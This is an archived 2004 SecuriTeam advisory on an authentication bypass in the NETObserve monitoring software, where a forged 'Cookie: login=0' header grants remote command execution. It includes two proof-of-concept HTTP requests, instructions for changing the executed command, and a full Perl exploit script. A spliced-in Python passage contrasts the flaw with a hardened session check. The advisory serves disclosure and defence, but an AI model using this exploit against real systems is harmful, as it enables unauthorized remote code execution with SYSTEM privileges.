[NT] NETObserve Security Bypass Vulnerability
From: SecuriTeam (support_at_securiteam.com)
Date: 01/01/04
To: list@securiteam.com Date: 1 Jan 2004 12:00:49 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
NETObserve Security Bypass Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://www.exploreanywhere.com/no-intro.php> NETObserve is "your all in
one solution to monitoring spouses, co-workers, children, employees and
just about any other person you may concerned of that is using your PC!
NETObserve will monitor not only what is going on within your PC, but it
can also record what is going on in front of your PC, with our
breakthrough web cam surveillance technology! With NETObserve on your
side, you will have remote, real-time access to your PC, allowing you to
remotely control and monitor a PC while you are away! Read on to find out
why NETObserve is leading the way in the cutting edge industry of PC
monitoring, surveillance, and administration!".
The product has been found to be very insecure: it allows an unauthenticated
remote attacker to create files on the remote computer, run them, view
arbitrary files, etc., all with SYSTEM privileges.
DETAILS
Vulnerable systems:
* NETObserve version 2.95.2 and prior
Security Bypass:
NETObserve appears very diligent about ensuring that any remote user
issuing commands to the server is properly authenticated: even if the
remote user closes his or her browser, they are required to log in again
before they can regain control of the remote system.
Once a legitimate session with a user has been established, the browser
confirms that the commands that the remote user is issuing are allowed to
be performed on the remote system by sending a special HTTP authentication
header to the NETObserve server.
The only problem with this is the fact that any malicious individuals can
attach the special header directly to their own specially crafted request,
and NETObserve blindly believes that a session with a legitimate user was
already in progress.
The special header in question is nothing more than 'Cookie: login=0'.
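As an added illustration (not part of this advisory and not NETObserve's code), the following Python contrasts the check the advisory describes, where a client-supplied 'login=0' cookie is taken as proof of a session, with a check that accepts only a random token the server itself issued and still holds; the request parser, SessionStore and function names are hypothetical, and the embedded request is a constructed copy of the advisory's first request.

```python
import secrets
from http.cookies import SimpleCookie

# Constructed sample: the advisory's first request, with the forged cookie.
FORGED_REQUEST = (
    "POST /sendeditfile HTTP/1.1\r\n"
    "Host: AnyHostWillDo\r\n"
    "Content-Length: 25\r\n"
    "Cookie: login=0\r\n"
    "\r\n"
    "newfiledata=cmd+%2Fc+calc"
)

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def cookie_value(headers, name):
    """Return one cookie's value from the Cookie header, or None if absent."""
    jar = SimpleCookie()
    jar.load(headers.get("cookie", ""))
    return jar[name].value if name in jar else None

class SessionStore:
    """Hypothetical server-side session table: a token is valid only while issued and not revoked."""
    def __init__(self):
        self._live = set()
    def login(self):
        token = secrets.token_urlsafe(32)   # 256 random bits, not guessable
        self._live.add(token)
        return token
    def logout(self, token):
        self._live.discard(token)
    def is_live(self, token):
        return token is not None and token in self._live

def authenticated_vulnerable(headers):
    """The flaw as described: the presence of login=0 alone is taken as proof of a session."""
    return cookie_value(headers, "login") == "0"

def authenticated_fixed(headers, store):
    """Hardened check: accept only a token this server issued and has not revoked."""
    return store.is_live(cookie_value(headers, "session"))
```

Against the forged request the vulnerable check returns True while the hardened one returns False, because no server-issued token is present; only a token obtained from SessionStore.login() passes, and it stops passing after logout().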
Proof of Concept Code:
The following two HTTP requests will execute commands via the Windows
command interpreter on the remote system:
REQUEST #1:
--------------------------------------------------------------------------
POST /sendeditfile HTTP/1.1
Accept: */*
Referer: http://127.0.0.1/editfile=?C:\WINDOWS\win.bat?
Content-Type: application/x-www-form-urlencoded
Host: AnyHostWillDo
Content-Length: 25
Cookie: login=0

newfiledata=cmd+%2Fc+calc
--------------------------------------------------------------------------
REQUEST #2:
--------------------------------------------------------------------------
GET /runfile=?C:\windows\win.bat? HTTP/1.1
Accept: */*
Host: AnyHostWillDo
Cookie: login=0
--------------------------------------------------------------------------
To change the commands to be run, set the 'Content-Length' of the first
request to the length of the command line, including the string
'newfiledata='. Then alter the data posted under 'newfiledata', replacing
spaces with '+' and URL-encoding reserved characters such as '/' as their
hexadecimal values ('%2F' in this instance).
Sent unaltered, these requests launch the Windows calculator.
Exploit:
#!/usr/bin/perl
#
# Exploit by SecurITeam
use IO::Socket;

unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);

# Request #1: write the command line into a batch file via /sendeditfile,
# presenting the 'Cookie: login=0' header in place of a real session.
$remote = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => "http(80)",
);
unless ($remote) { die "cannot connect to http daemon on $host" }
$remote->autoflush(1);
$request = "POST /sendeditfile HTTP/1.1\r\n"
         . "Accept: */*\r\n"
         . "Referer: http://$host/editfile=?C:\\WINNT\\win.bat?\r\n"
         . "Content-Type: application/x-www-form-urlencoded\r\n"
         . "Host: $host\r\n"
         . "Connection: close\r\n"
         . "Content-Length: 25\r\n"
         . "Cookie: login=0\r\n"
         . "\r\n"
         . "newfiledata=cmd+%2Fc+calc";
print $remote $request;
sleep(1);
$MAXLEN = 256;
if ($remote->recv($newmsg, $MAXLEN)) {
    print "Result: $newmsg\n";
}
sleep(1);
close $remote;

#----
# Request #2: ask the server to run the batch file via /runfile, again
# relying only on the 'Cookie: login=0' header.
$remote = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => "http(80)",
);
unless ($remote) { die "cannot connect to http daemon on $host" }
$remote->autoflush(1);
$request = "GET /runfile=?C:\\WINNT\\win.bat? HTTP/1.1\r\n"
         . "Accept: */*\r\n"
         . "Host: AnyHostWillDo\r\n"
         . "Cookie: login=0\r\n"
         . "\r\n";
print $remote $request;
sleep(1);
if ($remote->recv($newmsg, $MAXLEN)) {
    print "Result: $newmsg\n";
}
sleep(1);
close $remote;
ADDITIONAL INFORMATION
The original advisory can be found at:
http://www.elitehaven.net/netobserve.txt
The information has been provided by Peter Winter-Smith
(peter4020@hotmail.com) and SecurITeam (expert@securiteam.com).
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.